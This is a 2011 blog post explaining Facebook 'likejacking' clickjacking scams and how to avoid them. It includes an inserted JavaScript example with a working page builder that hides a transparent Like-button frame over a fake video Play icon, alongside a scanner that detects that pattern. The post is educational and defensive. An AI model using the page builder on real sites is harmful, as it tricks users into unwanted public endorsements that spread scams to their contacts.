
Monday 14 March 2011

Facebook Clickjacking Attacks

In a nutshell…

Clickjacking, in its broadest sense, is an attack that hides a real clickable control (typically inside a transparent frame) behind or on top of something the victim actually wants to click. The victim believes the click will do one thing, for example start a video, while the browser delivers it to the hidden control, which performs a quite different and unwanted action using whatever website the victim is already logged into.

Facebook clickjacking attacks are among the most prevalent, and are most commonly designed to get Facebook users to unwittingly "like" external websites, which in turn spreads those websites to the user's contact list.

Facebook clickjacking attacks are also dubbed "likejacking" since it utilises the "like" feature on Facebook.

How it works…

Anyone familiar with Facebook and how it operates will also be familiar with the ability to "Like" information such as comments, videos and status updates. When a Facebook user "likes" something, a post appears on their Facebook Wall saying that they "liked" it, which in turn appears in the news feed of many of their contacts.
A more recent addition to the "Like" feature lets website developers embed a "Like" button on their own websites, so Facebook users can "like" a website without being inside the Facebook environment. The button is served by Facebook inside a frame on the third-party page, and a click on it is processed by Facebook using the visitor's existing login session.

This has led scammers to hide the Facebook "Like" button on their websites (the frame is made transparent and positioned over something the visitor wants to click) and then trick users into clicking that area of the page. The user inadvertently "likes" the website, unaware that this action has been published on their Facebook Wall and in the news feed of many of their contacts.

The clickjacking is designed to bait people into "liking" a page so that the page propagates between Facebook users: contacts who see that their Facebook "friend" has "liked" a page are likely to visit the same page and fall into the same trap.

Popular Examples

The most prolific example is where Facebook users are baited with a video that does not exist. They are taken to a page that replicates a typical video sharing site. Users are clearly baited to click the Play icon in the middle of the video frame, and this is exactly where the hidden Facebook "Like" button is positioned. Clicking the Play button causes the user to "like" the webpage.

Some sites try to replicate YouTube, using a logo that reads TouTube, FouTube or FBTube.
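The page layout described in the two sections above (the Facebook "Like" frame made transparent and stacked over a fake Play icon), alongside a simple static check for that pattern, as an added example that is not code from the original post or from Facebook. It assumes the Like button plugin is embedded as a frame whose URL contains facebook.com/plugins/ (as it was at the time of writing); the decoy page, its element ids, the example.invalid link and the opacity threshold are all constructed here for illustration.

```javascript
// Added example: how a likejacking page is put together, and a static
// scanner for the same pattern. Assumptions: the Like button is an iframe
// whose src contains "facebook.com/plugins/"; the decoy page, element ids,
// the example.invalid URL and the 0.1 opacity threshold are illustrative.

const LIKE_PLUGIN_URL =
  "https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fexample.invalid%2Fvideo";

// The decoy page a scammer serves: a fake video player whose Play icon sits
// at a known position, with the real Like button frame placed directly over
// it at opacity 0. No script is needed; CSS alone steers the click into the
// frame, and facebook.com then records the "like" against the victim's
// existing session.
function buildLikejackingPage(playLeftPx, playTopPx) {
  return `<!DOCTYPE html>
<html><head><style>
  #player { position: relative; width: 640px; height: 360px; background: #000; }
  #play { position: absolute; left: ${playLeftPx}px; top: ${playTopPx}px;
          width: 80px; height: 80px; color: #fff; font-size: 64px; }
  /* invisible, but it still receives the click */
  #lk { position: absolute; left: ${playLeftPx}px; top: ${playTopPx}px;
        width: 80px; height: 80px; opacity: 0; z-index: 10; border: 0; }
</style></head>
<body>
  <div id="player">
    <div id="play">&#9654;</div>
    <iframe id="lk" src="${LIKE_PLUGIN_URL}" scrolling="no"></iframe>
  </div>
</body></html>`;
}

// Turn "prop: value; prop: value" into a lowercase property map.
function parseDeclarations(text) {
  const out = {};
  for (const decl of text.split(";")) {
    const i = decl.indexOf(":");
    if (i < 0) continue;
    out[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
  }
  return out;
}

// Collect "#id { ... }" rules from every <style> block into id -> declarations.
function collectIdRules(html) {
  const rules = {};
  const styleRe = /<style[^>]*>([\s\S]*?)<\/style>/gi;
  let m;
  while ((m = styleRe.exec(html)) !== null) {
    const css = m[1].replace(/\/\*[\s\S]*?\*\//g, ""); // drop CSS comments
    const ruleRe = /#([\w-]+)\s*\{([^}]*)\}/g;
    let r;
    while ((r = ruleRe.exec(css)) !== null) {
      rules[r[1]] = Object.assign(rules[r[1]] || {}, parseDeclarations(r[2]));
    }
  }
  return rules;
}

// Return the src of every iframe that loads a Facebook social plugin and is
// styled so the visitor cannot see it (opacity at or below 0.1) while still
// being able to receive clicks. display:none frames are ignored: they are
// not hit-testable, so they cannot be used for clickjacking.
function findLikejackingFrames(html) {
  const idRules = collectIdRules(html);
  const hits = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*"([^"]*)"/i) || [])[1] || "";
    if (!/facebook\.com\/plugins\//i.test(src)) continue;
    const id = (attrs.match(/\bid\s*=\s*"([^"]*)"/i) || [])[1];
    const inline = parseDeclarations((attrs.match(/\bstyle\s*=\s*"([^"]*)"/i) || [])[1] || "");
    // inline style wins over a stylesheet rule for the same id
    const style = Object.assign({}, id ? idRules[id] : {}, inline);
    const opacity = style.opacity === undefined ? 1 : parseFloat(style.opacity);
    if (opacity <= 0.1 && style.display !== "none") hits.push(src);
  }
  return hits;
}

module.exports = { LIKE_PLUGIN_URL, buildLikejackingPage, findLikejackingFrames };
```

Run it with node; `findLikejackingFrames(buildLikejackingPage(280, 140))` returns the Like plugin URL, while a normally styled Like button returns nothing. The check only sees styles written into the page source: a frame made transparent by script after load, moved under the pointer as the mouse moves, or clipped down to a few pixels would slip past it, which is why an in-browser check performed at click time is the more reliable defence.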

Other popular examples ask users to "prove they're human" by clicking certain areas of a webpage in a certain order. The Facebook "Like" button is simply hidden under one of those areas.

Survey Scams

2011 has seen a significant increase in clickjacking attacks employed to help survey scammers. Facebook survey scams have previously spread through various tactics, including rogue Facebook applications, forcing a user to "like" and "share" an external website, or forcing them to join a Facebook group. Clickjacking is the latest tactic survey scammers are using to spread their malicious links.

Survey scams are where scammers trick victims into completing surveys on the false promise that the victim will receive something in return. Once a victim completes a survey, the scammer gets paid. More information on Facebook survey scams can be seen here.

Victim?

If you have fallen victim to a clickjacking attack, the first thing to do is remove the offending "like" post that your Facebook account has just produced. Go to your profile and hover over the post, click the "x" in the top right and then click Remove. This stops your Facebook contacts from falling into the same trap. Removing the post does not necessarily undo the "like" itself, so also check the pages listed under your profile's likes and "Unlike" the scam page there.

For most clickjacking attacks on Facebook, this is all you need to do, since many of them carry no malicious payload beyond the unwanted "like".

If you think you may have downloaded something onto your computer through the attack, run an up-to-date virus scan to check for threats.

Avoiding Clickjacking Attacks

The easiest way to avoid such attacks is to be careful about which links you click on Facebook and to always be wary of suspicious links and websites. If a link is offering you something that you think does not exist or is too good to be true, then it probably is.

There are other, more technical ways to avoid clickjacking attacks, such as using the Firefox web browser with the NoScript add-on. NoScript's ClearClick feature checks, at the moment you click, whether the element under the pointer is an embedded frame that has been made transparent or obscured, and warns you before the click goes through. That is the check that matters here, because a likejacking page needs no script of its own, only an invisible frame; NoScript can additionally block all embedded script and plugins on sites you do not trust. Note that the usual site-side defence against clickjacking, refusing to be loaded inside a frame (the X-Frame-Options header), cannot help in this case, since the "Like" button only works when third-party sites frame it.

Additionally, always make sure you use the most recent version of your web browser (Internet Explorer, Firefox, Opera, Chrome).
